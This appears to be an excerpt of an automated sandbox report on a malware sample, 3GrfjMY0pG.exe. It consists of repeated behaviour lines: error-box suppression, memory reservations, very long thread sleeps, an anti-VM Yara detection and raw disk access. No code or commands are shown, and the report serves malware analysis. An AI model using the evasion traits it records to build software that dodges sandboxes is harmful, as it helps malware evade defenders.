Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 3390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 8210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 93C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: A3C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: A720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: B720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: C720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 1430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Memory allocated: 1690000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598670	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595280	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595059	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594950	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594515	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6646	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2957	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Window / User API: threadDelayed 1884	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Window / User API: threadDelayed 7970	Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1092	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6892	Thread sleep count: 1884 > 30	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6892	Thread sleep count: 7970 > 30	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598998s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598670s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -595059s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -594950s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -594624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1456	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6768	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598670	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 598015	Jump to behavior
